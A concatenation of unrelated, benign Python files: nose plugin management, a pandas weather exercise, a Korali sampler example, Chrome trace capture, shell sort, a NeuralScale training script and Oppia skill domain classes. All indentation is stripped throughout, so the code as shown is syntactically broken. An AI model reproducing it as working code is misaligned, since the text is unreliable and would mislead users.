enabled = [plug for plug in self._plugins if plug.enabled]
self.plugins = enabled
self.sort()
log.debug("Plugins enabled: %s", enabled)
def loadPlugins(self):
for plug in self._extraplugins:
self.addPlugin(plug)
def sort(self):
return sort_list(self._plugins, lambda x: getattr(x, 'score', 1), reverse=True)
def _get_plugins(self):
return self._plugins
def _set_plugins(self, plugins):
self._plugins = []
self.addPlugins(plugins)
plugins = property(_get_plugins, _set_plugins, None,
"""Access the list of plugins managed by
this plugin manager""")
class ZeroNinePlugin:
"""Proxy for 0.9 plugins, adapts 0.10 calls to 0.9 standard.
"""
def __init__(self, plugin):
self.plugin = plugin
def options(self, parser, env=os.environ):
self.plugin.add_options(parser, env)
def addError(self, test, err):
if not hasattr(self.plugin, 'addError'):
return
# switch off to addSkip, addDeprecated if those types
from nose.exc import SkipTest, DeprecatedTest
ec, ev, tb = err
if issubclass(ec, SkipTest):
if not hasattr(self.plugin, 'addSkip'):
return
return self.plugin.addSkip(test.test)
elif issubclass(ec, DeprecatedTest):
if not hasattr(self.plugin, 'addDeprecated'):
return
return self.plugin.addDeprecated(test.test)
# add capt
capt = test.capturedOutput
return self.plugin.addError(test.test, err, capt)
def loadTestsFromFile(self, filename):
if hasattr(self.plugin, 'loadTestsFromPath'):
return self.plugin.loadTestsFromPath(filename)
def addFailure(self, test, err):
if not hasattr(self.plugin, 'addFailure'):
return
# add capt and tbinfo
capt = test.capturedOutput
tbinfo = test.tbinfo
return self.plugin.addFailure(test.test, err, capt, tbinfo)
def addSuccess(self, test):
if not hasattr(self.plugin, 'addSuccess'):
return
capt = test.capturedOutput
self.plugin.addSuccess(test.test, capt)
def startTest(self, test):
if not hasattr(self.plugin, 'startTest'):
return
return self.plugin.startTest(test.test)
def stopTest(self, test):
if not hasattr(self.plugin, 'stopTest'):
return
return self.plugin.stopTest(test.test)
def __getattr__(self, val):
return getattr(self.plugin, val)
class EntryPointPluginManager(PluginManager):
"""Plugin manager that loads plugins from the `nose.plugins` and
`nose.plugins.0.10` entry points.
"""
entry_points = (('nose.plugins.0.10', None),
('nose.plugins', ZeroNinePlugin))
def loadPlugins(self):
"""Load plugins by iterating the `nose.plugins` entry point.
"""
from pkg_resources import iter_entry_points
loaded = {}
for entry_point, adapt in self.entry_points:
for ep in iter_entry_points(entry_point):
if ep.name in loaded:
continue
loaded[ep.name] = True
log.debug('%s load plugin %s', self.__class__.__name__, ep)
try:
plugcls = ep.load()
except KeyboardInterrupt:
raise
except Exception as e:
# never want a plugin load to kill the test run
# but we can't log here because the logger is not yet
# configured
warn("Unable to load plugin %s: %s" % (ep, e),
RuntimeWarning)
continue
if adapt:
plug = adapt(plugcls())
else:
plug = plugcls()
self.addPlugin(plug)
super(EntryPointPluginManager, self).loadPlugins()
class BuiltinPluginManager(PluginManager):
"""Plugin manager that loads plugins from the list in
`nose.plugins.builtin`.
"""
def loadPlugins(self):
"""Load plugins in nose.plugins.builtin
"""
from nose.plugins import builtin
for plug in builtin.plugins:
self.addPlugin(plug())
super(BuiltinPluginManager, self).loadPlugins()
try:
import pkg_resources
class DefaultPluginManager(EntryPointPluginManager, BuiltinPluginManager):
pass
except ImportError:
class DefaultPluginManager(BuiltinPluginManager):
pass
class RestrictedPluginManager(DefaultPluginManager):
"""Plugin manager that restricts the plugin list to those not
excluded by a list of exclude methods. Any plugin that implements
an excluded method will be removed from the manager's plugin list
after plugins are loaded.
"""
def __init__(self, plugins=(), exclude=(), load=True):
DefaultPluginManager.__init__(self, plugins)
self.load = load
self.exclude = exclude
self.excluded = []
self._excludedOpts = None
def excludedOption(self, name):
if self._excludedOpts is None:
from optparse import OptionParser
self._excludedOpts = OptionParser(add_help_option=False)
for plugin in self.excluded:
plugin.options(self._excludedOpts, env={})
return self._excludedOpts.get_option('--' + name)
def loadPlugins(self):
if self.load:
DefaultPluginManager.loadPlugins(self)
allow = []
for plugin in self.plugins:
ok = True
for method in self.exclude:
if hasattr(plugin, method):
ok = False
self.excluded.append(plugin)
break
if ok:
allow.append(plugin)
self.plugins = allow
|
the-stack_0_6477 | # --------------
#Importing the modules
import pandas as pd
import numpy as np
from scipy.stats import mode
def categorical(df):
""" Extract names of categorical column
This function accepts a dataframe and returns categorical list,
containing the names of categorical columns(categorical_var).
"""
categorical_var= df.select_dtypes(include='object').columns.tolist()
return categorical_var
def numerical(df):
""" Extract names of numerical column
This function accepts a dataframe and returns numerical list,
containing the names of numerical columns(numerical_var).
"""
numerical_var = df.select_dtypes(include='number').columns.tolist()
return numerical_var
def clear(df,col,val):
""" Check distribution of variable
This function accepts a dataframe, a column (feature) and a value, and returns the count of that value
in the column (value_counts).
"""
value_counts = df[col].value_counts()[val]
return value_counts
def instances_based_condition(df,col1,val1,col2,val2):
""" Instances based on the condition
This function accepts a dataframe, 2 columns(feature) and 2 values which returns the dataframe
based on the condition.
"""
instance = df[(df[col1] > val1) & (df[col2]== val2)]
return instance
def agg_values_ina_month(df,date_col,agg_col, agg):
""" Aggregate values according to month
This function accepts a dataframe, 2 columns (features) and an aggregation function (agg), and returns a pivot
table with the aggregated values of the feature, indexed by month.
"""
df[date_col] = pd.to_datetime(df[date_col])
aggregate = {'mean':np.mean,'max':np.max,'min':np.min,'sum':np.sum,'len':len}
aggregated_value = df.pivot_table(values=[agg_col], index=df[date_col].dt.month,aggfunc={agg_col:aggregate[agg]})
return aggregated_value
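# For reference, the pivot above is equivalent to calling pandas directly
# (sketch only; the column names are taken from the usage further below):
# weather['Date/Time'] = pd.to_datetime(weather['Date/Time'])
# weather.pivot_table(values=['Temp (C)'],
#                     index=weather['Date/Time'].dt.month,
#                     aggfunc=np.mean)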
# Code to group values based on the feature
def group_values(df,col1,agg1):
""" Agrregate values by grouping
This function accepts a dataframe, 1 column(feature) and aggregated function(agg1) which groupby the datframe based on the column.
"""
aggregate = {'mean':np.mean,'max':np.max,'min':np.min,'sum':np.sum,'len':len}
grouping = df.groupby(col1).agg(aggregate[agg1])
return grouping
# function for conversion
def convert(df,celsius):
""" Convert temperatures from celsius to fahrenhheit
This function accepts a dataframe, 1 column(feature) which returns the dataframe with converted values from
celsius to fahrenhheit.
"""
centigrade_temps = df[celsius]
converted_temp = 1.8*centigrade_temps + 32
return converted_temp
# Load the weather_2012 data csv file and store it in weather variable.
weather = pd.read_csv(path)
weather.head()
# Check the categorical and numerical variables. You can check it by calling categorical and numerical function.
print(categorical(weather))
print(numerical(weather))
#Checking the distribution of a specific value like the number of times the weather was exactly Clear in the given column.
#You can check it by calling the function clear with respective parameters.
print(clear(weather,"Weather",'Clear'))
print(clear(weather,"Wind Spd (km/h)", 4))
#Check some instances based on a specific condition like when the wind speed was above 35 and visibility was 25.
#Check it by calling the function instances_based_condition with respective parameters.
wind_speed_35_vis_25 = instances_based_condition(weather,'Wind Spd (km/h)',35,'Visibility (km)',25)
#Calculate the mean temperature recorded by month from temperature data. Generate a pivot table which contains the aggregated values(like mean, max ,min, sum, len) recoreded by month.
#Call the function agg_values_ina_month with respective parameters.
agg_values_ina_month(weather,'Date/Time','Dew Point Temp (C)','mean')
# To groupby based on a column like on Weather column and then aggregate the mean values of each column for different types of weather using mean.
#Call the function group_values.
mean_weather = group_values(weather,"Weather",'mean')
# Convert celsius temperatures into fahrenheit temperatures from temperature data by calling the function convert.
weather_fahrenheit = convert(weather,"Temp (C)")
|
the-stack_0_6478 | #!/usr/bin/env python3
# In this example, we demonstrate how a Korali experiment can
# be resumed from any point (generation). This is a useful feature
# for continuing jobs after an error, or to fragment big jobs into
# smaller ones that can better fit a supercomputer queue.
#
# First, we run a simple Korali experiment.
import sys
sys.path.append('./_model')
from model import *
import korali
k = korali.Engine()
e = korali.Experiment()
e["Problem"]["Type"] = "Bayesian/Custom"
e["Problem"]["Likelihood Model"] = calculateLogLikelihood
e["Solver"]["Type"] = "Sampler/TMCMC"
e["Solver"]["Population Size"] = 5000
e["Solver"]["Termination Criteria"]["Max Generations"] = 4
e["Distributions"][0]["Name"] = "Uniform 0"
e["Distributions"][0]["Type"] = "Univariate/Uniform"
e["Distributions"][0]["Minimum"] = -100.0
e["Distributions"][0]["Maximum"] = +100.0
e["Variables"][0]["Name"] = "X"
e["Variables"][0]["Prior Distribution"] = "Uniform 0"
print("\n-------------------------------------------------------------")
print("Running first generations...")
print("-------------------------------------------------------------\n")
k.run(e)
print("\n-------------------------------------------------------------")
print("Running last generations...")
print("-------------------------------------------------------------\n")
e["Solver"]["Termination Criteria"]["Max Generations"] = 10
k.run(e)
|
the-stack_0_6481 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import time
from profile_chrome import chrome_startup_tracing_agent
from profile_chrome import chrome_tracing_agent
from profile_chrome import ui
from profile_chrome import util
from systrace import output_generator
from systrace import tracing_controller
def _GetResults(trace_results, controller, output, compress, write_json,
interval):
ui.PrintMessage('Downloading...')
# Wait for the trace file to get written.
time.sleep(1)
for agent in controller.get_child_agents:
if isinstance(agent, chrome_tracing_agent.ChromeTracingAgent):
time.sleep(interval / 4)
# Ignore the systraceController because it will not contain any results,
# instead being in charge of collecting results.
trace_results = [x for x in controller.all_results if not (x.source_name ==
'systraceController')]
if not trace_results:
ui.PrintMessage('No results')
return ''
result = None
trace_results = output_generator.MergeTraceResultsIfNeeded(trace_results)
if not write_json:
ui.PrintMessage('Writing trace HTML...')
html_file = trace_results[0].source_name + '.html'
result = output_generator.GenerateHTMLOutput(trace_results, html_file)
ui.PrintMessage('\nWrote file://%s' % result)
elif compress and len(trace_results) == 1:
result = output or trace_results[0].source_name + '.gz'
util.WriteDataToCompressedFile(trace_results[0].raw_data, result)
elif len(trace_results) > 1:
result = (output or 'chrome-combined-trace-%s.zip' %
util.GetTraceTimestamp())
util.ArchiveData(trace_results, result)
elif output:
result = output
with open(result, 'wb') as f:
f.write(trace_results[0].raw_data)
else:
result = trace_results[0].source_name
with open(result, 'wb') as f:
f.write(trace_results[0].raw_data)
return result
def CaptureProfile(options, interval, modules, output=None,
compress=False, write_json=False):
"""Records a profiling trace saves the result to a file.
Args:
options: Command line options.
interval: Time interval to capture in seconds. An interval of None (or 0)
continues tracing until stopped by the user.
modules: The list of modules to initialize the tracing controller with.
output: Output file name or None to use an automatically generated name.
compress: If True, the result will be compressed either with gzip or zip
depending on the number of captured subtraces.
write_json: If True, prefer JSON output over HTML.
Returns:
Path to saved profile.
"""
agents_with_config = tracing_controller.CreateAgentsWithConfig(options,
modules)
if chrome_startup_tracing_agent in modules:
controller_config = tracing_controller.GetChromeStartupControllerConfig(
options)
else:
controller_config = tracing_controller.GetControllerConfig(options)
controller = tracing_controller.TracingController(agents_with_config,
controller_config)
try:
result = controller.StartTracing()
trace_type = controller.GetTraceType()
if not result:
ui.PrintMessage('Trace starting failed.')
if interval:
ui.PrintMessage(('Capturing %d-second %s. Press Enter to stop early...' %
(interval, trace_type)), eol='')
ui.WaitForEnter(interval)
else:
ui.PrintMessage('Capturing %s. Press Enter to stop...' % trace_type,
eol='')
raw_input()
ui.PrintMessage('Stopping...')
all_results = controller.StopTracing()
finally:
if interval:
ui.PrintMessage('done')
return _GetResults(all_results, controller, output, compress, write_json,
interval)
|
the-stack_0_6482 | def shellSort(arr):
_len = len(arr)
gap = _len
while gap > 1:
gap = gap // 2  # gap between compared elements
for i in range(gap, _len):
j, curr = i, arr[i]
while j >= gap and curr < arr[j - gap]:
arr[j] = arr[j - gap]  # shift the larger value one gap backwards
j -= gap  # move one gap forward to keep comparing
arr[j] = curr  # insertion position found; place the value
return arr
a = [31, 42, 13, 54, 5]
print(shellSort(a))
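# Variant sketch using Knuth's gap sequence (1, 4, 13, 40, ...) instead of
# repeated halving; the insertion logic is unchanged:
# def shell_sort_knuth(arr):
#     gap = 1
#     while gap < len(arr) // 3:
#         gap = gap * 3 + 1
#     while gap >= 1:
#         for i in range(gap, len(arr)):
#             j, curr = i, arr[i]
#             while j >= gap and curr < arr[j - gap]:
#                 arr[j] = arr[j - gap]
#                 j -= gap
#             arr[j] = curr
#         gap //= 3
#     return arr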
|
the-stack_0_6483 | '''
Run models (ResNet18, MobileNetV2) by scaling filter sizes to different ratios on TinyImageNet.
Stores accuracy for comparison plot.
Default Scaling Ratios: 0.25, 0.5, 0.75, 1.0
'''
from __future__ import print_function
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath('.'))))
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as utils_data
from torch.autograd import Variable
import torchvision
import torchvision.transforms as transforms
import numpy as np
import numpy.linalg as la
import pdb
import pickle
import visdom
import time
import torch.backends.cudnn as cudnn
import gc
import math
import argparse
import copy
from utils import progress_bar, save_checkpoint, adjust_learning_rate, accuracy, adjust_learning_rate_imagenet
import csv
from sklearn import linear_model
from model.VGG import vgg11
from model.preact_resnet import PreActResNet18
from model.resnet import *
from model.lenet import LeNet
from model.mobilenetv2 import MobileNetV2
from torch.optim.lr_scheduler import StepLR
from copy import deepcopy
##############
## Function ##
##############
def num_flat_features(x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def train(args, model, train_loader, optimizer, epoch, criterion, pruning_engine=None, scheduler=None):
"""Train for one epoch on the training set also performs pruning"""
train_loss = 0
train_acc = 0
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.cuda(), target.cuda()
# make sure that all gradients are zero
for p in model.parameters():
if p.grad is not None:
p.grad.detach_()
p.grad.zero_()
output = model(data)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
loss.backward()
optimizer.step()
train_loss += loss.item()
train_acc += prec1.item()
progress_bar(batch_idx, len(train_loader), 'Loss: %.3f | Acc: %.3f%%'
% (train_loss/(batch_idx+1), train_acc/(batch_idx+1)))
return train_acc/(batch_idx+1), train_loss/(batch_idx+1)
def validate(args, test_loader, model, criterion, epoch, pruning_engine=None, optimizer=None):
"""Perform validation on the validation set"""
test_loss = 0
test_acc = 0
# switch to evaluate mode
model.eval()
with torch.no_grad():
for batch_idx, (data, target) in enumerate(test_loader):
data = data.cuda()
target = target.cuda()
output = model(data)
loss = criterion(output, target)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
test_loss += loss.item()
test_acc += prec1.item()
progress_bar(batch_idx, len(test_loader), 'Loss: %.3f | Acc: %.3f%%'
% (test_loss/(batch_idx+1), test_acc/(batch_idx+1)))
return test_acc/(batch_idx+1), test_loss/(batch_idx+1)
def main():
# Training settings
parser = argparse.ArgumentParser(description='Efficient Filter Scaling of Convolutional Neural Network')
parser.add_argument('--batch-size', type=int, default=128, metavar='N',
help='input batch size for training (default: 128)')
parser.add_argument('--epochs', type=int, default=150, metavar='N',
help='number of epochs to train (default: 150)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='weight decay (default: 5e-4)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--dataset', default="tinyimagenet", type=str,
help='dataset for experiment, choice: tinyimagenet', choices= ["tinyimagenet"])
parser.add_argument('--data', metavar='DIR', default='/DATA/tiny-imagenet-200', help='path to imagenet dataset')
parser.add_argument('--model', default="resnet18", type=str,
help='model selection, choices: vgg, mobilenetv2, resnet18',
choices=["mobilenetv2", "resnet18"])
parser.add_argument('--save', default='model',
help='model file')
parser.add_argument('--prune_fname', default='filename',
help='prune save file')
parser.add_argument('--descent_idx', type=int, default=14,
help='Iteration for Architecture Descent')
parser.add_argument('--morph', dest="morph", action='store_true', default=False,
help='Prunes only 50 percent of neurons, for comparison with MorphNet')
parser.add_argument('--uniform', dest="uniform", action='store_true', default=False,
help='Use uniform scaling instead of NeuralScale')
args = parser.parse_args()
##################
## Data loading ##
##################
kwargs = {'num_workers': 1, 'pin_memory': True}
if args.dataset == "tinyimagenet":
print("Using tiny-Imagenet Dataset")
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'test')
normalize = transforms.Normalize([0.4802, 0.4481, 0.3975], [0.2302, 0.2265, 0.2262])
train_dataset = torchvision.datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomRotation(20),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]))
train_sampler = None
kwargs = {'num_workers': 16}
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),
sampler=train_sampler, pin_memory=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
torchvision.datasets.ImageFolder(valdir, transforms.Compose([
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=False, pin_memory=True, **kwargs)
else:
print("Dataset does not exist! [Imagenet]")
exit()
if args.dataset=='tinyimagenet':
num_classes = 200
else:
print("Only tinyimagenet")
exit()
ratios = [0.25, 0.5, 0.75, 1.0]
pruned_filters = None
neuralscale = True # turn on NeuralScale by default
if args.uniform:
neuralscale = False
if args.morph:
neuralscale = False
if args.model == "resnet18":
pruned_filters = [82,90,78,80,96,180,104,96,194,312,182,178,376,546,562,454,294] # resnet18 tinyimagenet
        elif args.model == "mobilenetv2":
pruned_filters = [28, 16, 24, 24, 32, 32, 30, 64, 59, 50, 41, 96, 73, 48, 160, 69, 47, 155, 360] # mobilenetv2 tinyimagenet
else:
print("{} not supported.".format(args.model))
exit()
for ratio in ratios:
print("Current ratio: {}".format(ratio))
###########
## Model ##
###########
print("Setting Up Model...")
if args.model == "resnet18":
model = PreActResNet18(ratio=ratio, neuralscale=neuralscale, num_classes=num_classes, dataset=args.dataset, prune_fname=args.prune_fname, descent_idx=args.descent_idx, pruned_filters=pruned_filters)
elif args.model == "mobilenetv2":
model = MobileNetV2(ratio=ratio, neuralscale=neuralscale, num_classes=num_classes, dataset=args.dataset, prune_fname=args.prune_fname, descent_idx=args.descent_idx, pruned_filters=pruned_filters)
else:
print(args.model, "model not supported [resnet18 mobilenetv2] only")
exit()
print("{} set up.".format(args.model))
# for model saving
model_path = "saved_models"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_save_folder = "%s/%s"%(model_path, args.model)
if not os.path.exists(log_save_folder):
os.makedirs(log_save_folder)
model_save_path = "%s/%s"%(log_save_folder, args.save) + "_checkpoint.t7"
model_state_dict = model.state_dict()
if args.save:
print("Model will be saved to {}".format(model_save_path))
save_checkpoint({
'state_dict': model_state_dict
}, False, filename = model_save_path)
else:
print("Save path not defined. Model will not be saved.")
# Assume cuda is available and uses single GPU
model.cuda()
cudnn.benchmark = True
# define objective
criterion = nn.CrossEntropyLoss()
######################
## Set up pruning ##
######################
# remove updates from gate layers, because we want them to be 0 or 1 constantly
parameters_for_update = []
parameters_for_update_named = []
for name, m in model.named_parameters():
if "gate" not in name:
parameters_for_update.append(m)
parameters_for_update_named.append((name, m))
else:
print("skipping parameter", name, "shape:", m.shape)
total_size_params = sum([np.prod(par.shape) for par in parameters_for_update])
print("Total number of parameters, w/o usage of bn consts: ", total_size_params)
optimizer = optim.SGD(parameters_for_update, lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
###############
## Training ##
###############
best_test_acc = 0
train_acc_plt = []
train_loss_plt = []
test_acc_plt = []
test_loss_plt = []
epoch_plt = []
for epoch in range(1, args.epochs + 1):
adjust_learning_rate_imagenet(args, optimizer, epoch, search=False)
print("Epoch: {}".format(epoch))
# train model
train_acc, train_loss = train(args, model, train_loader, optimizer, epoch, criterion)
# evaluate on validation set
test_acc, test_loss = validate(args, test_loader, model, criterion, epoch, optimizer=optimizer)
# remember best prec@1 and save checkpoint
is_best = test_acc > best_test_acc
best_test_acc = max(test_acc, best_test_acc)
model_state_dict = model.state_dict()
if args.save:
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model_state_dict,
'best_prec1': test_acc,
}, is_best, filename=model_save_path)
train_acc_plt.append(train_acc)
train_loss_plt.append(train_loss)
test_acc_plt.append(test_acc)
test_loss_plt.append(test_loss)
epoch_plt.append(epoch)
pickle_save = {
"ratio": ratio,
"train_acc": train_acc_plt,
"train_loss": train_loss_plt,
"test_acc": test_acc_plt,
"test_loss": test_loss_plt,
}
plot_path = "saved_plots"
if not os.path.exists(plot_path):
os.makedirs(plot_path)
log_save_folder = "%s/%s"%(plot_path, args.model)
if not os.path.exists(log_save_folder):
os.makedirs(log_save_folder)
pickle_out = open("%s/%s_%s.pk"%(log_save_folder, args.save, int(ratio*100)),"wb")
pickle.dump(pickle_save, pickle_out)
pickle_out.close()
if __name__ == '__main__':
main()
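# Illustrative invocation sketch (not part of the original script); the script
# name, dataset path and flag values below are placeholder assumptions:
#   python train.py --model resnet18 --dataset tinyimagenet \
#       --data /DATA/tiny-imagenet-200 --save neuralscale_r18 --descent_idx 14
#   python train.py --model mobilenetv2 --uniform --save uniform_mbv2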
|
the-stack_0_6484 | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain objects relating to skills."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from constants import constants
from core.domain import change_domain
from core.domain import html_cleaner
from core.domain import state_domain
import feconf
import python_utils
import utils
# Do not modify the values of these constants. This is to preserve backwards
# compatibility with previous change dicts.
SKILL_PROPERTY_DESCRIPTION = 'description'
SKILL_PROPERTY_LANGUAGE_CODE = 'language_code'
SKILL_PROPERTY_SUPERSEDING_SKILL_ID = 'superseding_skill_id'
SKILL_PROPERTY_ALL_QUESTIONS_MERGED = 'all_questions_merged'
SKILL_CONTENTS_PROPERTY_EXPLANATION = 'explanation'
SKILL_CONTENTS_PROPERTY_WORKED_EXAMPLES = 'worked_examples'
SKILL_MISCONCEPTIONS_PROPERTY_NAME = 'name'
SKILL_MISCONCEPTIONS_PROPERTY_NOTES = 'notes'
SKILL_MISCONCEPTIONS_PROPERTY_FEEDBACK = 'feedback'
# These take additional 'property_name' and 'new_value' parameters and,
# optionally, 'old_value'.
CMD_UPDATE_SKILL_PROPERTY = 'update_skill_property'
CMD_UPDATE_SKILL_CONTENTS_PROPERTY = 'update_skill_contents_property'
CMD_UPDATE_SKILL_MISCONCEPTIONS_PROPERTY = (
'update_skill_misconceptions_property')
CMD_UPDATE_RUBRICS = 'update_rubrics'
CMD_ADD_SKILL_MISCONCEPTION = 'add_skill_misconception'
CMD_DELETE_SKILL_MISCONCEPTION = 'delete_skill_misconception'
CMD_CREATE_NEW = 'create_new'
CMD_MIGRATE_CONTENTS_SCHEMA_TO_LATEST_VERSION = (
'migrate_contents_schema_to_latest_version')
CMD_MIGRATE_MISCONCEPTIONS_SCHEMA_TO_LATEST_VERSION = (
'migrate_misconceptions_schema_to_latest_version')
CMD_MIGRATE_RUBRICS_SCHEMA_TO_LATEST_VERSION = (
'migrate_rubrics_schema_to_latest_version')
CMD_PUBLISH_SKILL = 'publish_skill'
class SkillChange(change_domain.BaseChange):
"""Domain object for changes made to skill object.
The allowed commands, together with the attributes:
- 'add_skill_misconception' (with new_misconception_dict)
- 'delete_skill_misconception' (with misconception_id)
- 'create_new'
- 'update_skill_property' (with property_name, new_value
and old_value)
- 'update_skill_contents_property' (with property_name,
new_value and old_value)
- 'update_skill_misconceptions_property' (
with misconception_id, property_name, new_value and old_value)
- 'migrate_contents_schema_to_latest_version' (with
from_version and to_version)
- 'migrate_misconceptions_schema_to_latest_version' (with
from_version and to_version)
"""
# The allowed list of skill properties which can be used in
# update_skill_property command.
SKILL_PROPERTIES = (
SKILL_PROPERTY_DESCRIPTION, SKILL_PROPERTY_LANGUAGE_CODE,
SKILL_PROPERTY_SUPERSEDING_SKILL_ID,
SKILL_PROPERTY_ALL_QUESTIONS_MERGED)
# The allowed list of skill contents properties which can be used in
# update_skill_contents_property command.
SKILL_CONTENTS_PROPERTIES = (
SKILL_CONTENTS_PROPERTY_EXPLANATION,
SKILL_CONTENTS_PROPERTY_WORKED_EXAMPLES)
# The allowed list of misconceptions properties which can be used in
# update_skill_misconceptions_property command.
SKILL_MISCONCEPTIONS_PROPERTIES = (
SKILL_MISCONCEPTIONS_PROPERTY_NAME,
SKILL_MISCONCEPTIONS_PROPERTY_NOTES,
SKILL_MISCONCEPTIONS_PROPERTY_FEEDBACK
)
ALLOWED_COMMANDS = [{
'name': CMD_CREATE_NEW,
'required_attribute_names': [],
'optional_attribute_names': []
}, {
'name': CMD_ADD_SKILL_MISCONCEPTION,
'required_attribute_names': ['new_misconception_dict'],
'optional_attribute_names': []
}, {
'name': CMD_DELETE_SKILL_MISCONCEPTION,
'required_attribute_names': ['misconception_id'],
'optional_attribute_names': []
}, {
'name': CMD_UPDATE_RUBRICS,
'required_attribute_names': ['difficulty', 'explanation'],
'optional_attribute_names': []
}, {
'name': CMD_UPDATE_SKILL_MISCONCEPTIONS_PROPERTY,
'required_attribute_names': [
'misconception_id', 'property_name', 'new_value', 'old_value'],
'optional_attribute_names': [],
'allowed_values': {'property_name': SKILL_MISCONCEPTIONS_PROPERTIES}
}, {
'name': CMD_UPDATE_SKILL_PROPERTY,
'required_attribute_names': ['property_name', 'new_value', 'old_value'],
'optional_attribute_names': [],
'allowed_values': {'property_name': SKILL_PROPERTIES}
}, {
'name': CMD_UPDATE_SKILL_CONTENTS_PROPERTY,
'required_attribute_names': ['property_name', 'new_value', 'old_value'],
'optional_attribute_names': [],
'allowed_values': {'property_name': SKILL_CONTENTS_PROPERTIES}
}, {
'name': CMD_MIGRATE_CONTENTS_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}, {
'name': CMD_MIGRATE_MISCONCEPTIONS_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}, {
'name': CMD_MIGRATE_RUBRICS_SCHEMA_TO_LATEST_VERSION,
'required_attribute_names': ['from_version', 'to_version'],
'optional_attribute_names': []
}]
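# Illustrative sketch (not part of the original Oppia module): the shape of a
# change dict for the 'add_skill_misconception' command defined above. Every
# field value here is a made-up placeholder for demonstration only.
_EXAMPLE_ADD_MISCONCEPTION_CHANGE = {
    'cmd': CMD_ADD_SKILL_MISCONCEPTION,
    'new_misconception_dict': {
        'id': 0,
        'name': 'Sample misconception',
        'notes': '<p>Sample notes for creators.</p>',
        'feedback': '<p>Sample feedback shown to learners.</p>'
    }
}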
class Misconception(python_utils.OBJECT):
"""Domain object describing a skill misconception."""
def __init__(
self, misconception_id, name, notes, feedback):
"""Initializes a Misconception domain object.
Args:
misconception_id: int. The unique id of each misconception.
name: str. The name of the misconception.
notes: str. General advice for creators about the
misconception (including examples) and general notes. This
should be an html string.
feedback: str. This can auto-populate the feedback field
when an answer group has been tagged with a misconception. This
should be an html string.
"""
self.id = misconception_id
self.name = name
self.notes = html_cleaner.clean(notes)
self.feedback = html_cleaner.clean(feedback)
def to_dict(self):
"""Returns a dict representing this Misconception domain object.
Returns:
A dict, mapping all fields of Misconception instance.
"""
return {
'id': self.id,
'name': self.name,
'notes': self.notes,
'feedback': self.feedback
}
@classmethod
def from_dict(cls, misconception_dict):
"""Returns a Misconception domain object from a dict.
Args:
misconception_dict: dict. The dict representation of
Misconception object.
Returns:
Misconception. The corresponding Misconception domain object.
"""
misconception = cls(
misconception_dict['id'], misconception_dict['name'],
misconception_dict['notes'], misconception_dict['feedback'])
return misconception
@classmethod
def require_valid_misconception_id(cls, misconception_id):
"""Validates the misconception id for a Misconception object.
Args:
misconception_id: int. The misconception id to be validated.
Raises:
ValidationError. The misconception id is invalid.
"""
if not isinstance(misconception_id, int):
raise utils.ValidationError(
'Expected misconception ID to be an integer, received %s' %
misconception_id)
def validate(self):
"""Validates various properties of the Misconception object.
Raises:
ValidationError: One or more attributes of the misconception are
invalid.
"""
self.require_valid_misconception_id(self.id)
if not isinstance(self.name, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected misconception name to be a string, received %s' %
self.name)
utils.require_valid_name(
self.name, 'misconception_name', allow_empty=False)
if not isinstance(self.notes, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected misconception notes to be a string, received %s' %
self.notes)
if not isinstance(self.feedback, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected misconception feedback to be a string, received %s' %
self.feedback)
class Rubric(python_utils.OBJECT):
"""Domain object describing a skill rubric."""
def __init__(self, difficulty, explanation):
"""Initializes a Rubric domain object.
Args:
difficulty: str. The question difficulty that this rubric addresses.
explanation: str. The explanation for the corresponding difficulty.
"""
self.difficulty = difficulty
self.explanation = html_cleaner.clean(explanation)
def to_dict(self):
"""Returns a dict representing this Rubric domain object.
Returns:
A dict, mapping all fields of Rubric instance.
"""
return {
'difficulty': self.difficulty,
'explanation': self.explanation
}
@classmethod
def from_dict(cls, rubric_dict):
"""Returns a Rubric domain object from a dict.
Args:
rubric_dict: dict. The dict representation of Rubric object.
Returns:
Rubric. The corresponding Rubric domain object.
"""
rubric = cls(
rubric_dict['difficulty'], rubric_dict['explanation'])
return rubric
def validate(self):
"""Validates various properties of the Rubric object.
Raises:
ValidationError: One or more attributes of the rubric are
invalid.
"""
if not isinstance(self.difficulty, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected difficulty to be a string, received %s' %
self.difficulty)
if self.difficulty not in constants.SKILL_DIFFICULTIES:
raise utils.ValidationError(
'Invalid difficulty received for rubric: %s' % self.difficulty)
